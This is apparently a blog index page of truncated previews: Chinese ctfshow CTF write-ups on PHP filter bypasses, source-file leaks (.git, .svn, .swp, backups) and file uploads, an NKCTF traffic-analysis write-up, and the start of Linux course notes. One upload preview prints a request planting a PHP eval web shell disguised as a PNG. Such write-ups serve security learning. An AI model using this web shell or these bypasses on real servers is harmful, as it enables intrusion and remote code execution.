hacker
未读web 89123456789if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; }}
num 不能含有 0-9 , 但是需要是数字
传入空数组 ( 被认为是零 )
?num[]=1
web 901234567891011if(isset($_GET['num'])){ $num = $_GET['num']; if($num==="4476"){ die("no no no!"); } if(intval($num,0)===44 ...
hacker
未读web 1查看源码 注释部分
web 2禁用右键和 F12, 使用 Ctrl+U 查看源文件(注释部分)
web 3BP 抓取返回包 或者 在’网络’中读取
web 4读取../robots.txt
web 5读取../index.phps
web 6读取../www.zip
web 7.git 泄露 , 访问../.git
web 8.svn 泄露 , 访问../.svn
web 9swp 临时文件泄露
访问 ../index.php.swp
(这是 vim 没有正常保存产生的 index.php 的备份文件)
web 10在’网络’中读取 cookie 值
web 11查找 flag.ctfshow.com 域名下的 txt 记录
域名 txt 记录查询
(这题可能环境坏了 直接给了 wp 和 flag 无法真正复现)
也可以用 nslookup
1nslookup -qt=txt flag.ctfshow.com
web 12提示说 “有时候网站上的公开信息,就是管理员常用密码”
某些信息:
1Help Line ...
hacker
未读web 151 前端检测在 bp 修改文件类型就能绕过前端检测
抓包上传
123456789101112POST /upload.php HTTP/1.1-----------------------------249623824540300659272997113405Content-Disposition: form-data; name="file"; filename="WD.php"Content-Type: image/png<?phpeval($_POST[1]);-----------------------------249623824540300659272997113405--AntSword: ../upload/WD.phpPassword: 1
web 152抓包上传
123456789101112POST /upload.php HTTP/1.1-----------------------------249623824540300659272997113405Content-Disposition: f ...
NKCTF_WP7 题 1400 分 50/1282 队
0x01 签到
关注公众号
发送口令得到 flag
0x02 流量分析
题目-服务器的返回包翻译
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136//1 whoamiroot//2 应该是ifconfig?/bin/sh: 1: ipconfig: not found//3 ifconfigeth0: flags=4163<UP,BROADCAST,RUNNING,M ...
目录0x01 计算机系统结构0x02 安装和配置 CentOS0x03 Linux 基础知识0x04 Linux 文件和目录管理0x05 文件压缩和解压缩0x06 查看和处理文件内容0x07 Linux 文本编辑器0x08 Linux 安装软件0x09 用户和权限管理0x10 Linux 网络管理0x11 系统状态管理
0x01 计算机系统结构1.1 计算机发展历史1.1.1 计算机组成
计算机应用程序
操作系统、编译原理、计算机网络
计算机体系结构
CPU/GPU、内存/硬盘、显示器/键盘
1.1.2 发展历史1) 图灵理论计算的本质是一种机械运动,但它需要信息(指令)控制
2)香农《继电器与开关电路的符号分析》将电路开关和布尔代结合起来
3)冯·诺依曼体系结构一般的计算机的组成:控制器,运算器,存储器,输入设备和输出设备
3)发展历程
1946 电子管计算机
1956 晶体管计算机
1964 集成电路计算机
1972 超大规模继承电路计算机
1.2 计算机硬件1.2.1 CPU 中央处理器
解释指令 处理数据
1 ) 组成
控制单元(Cont ...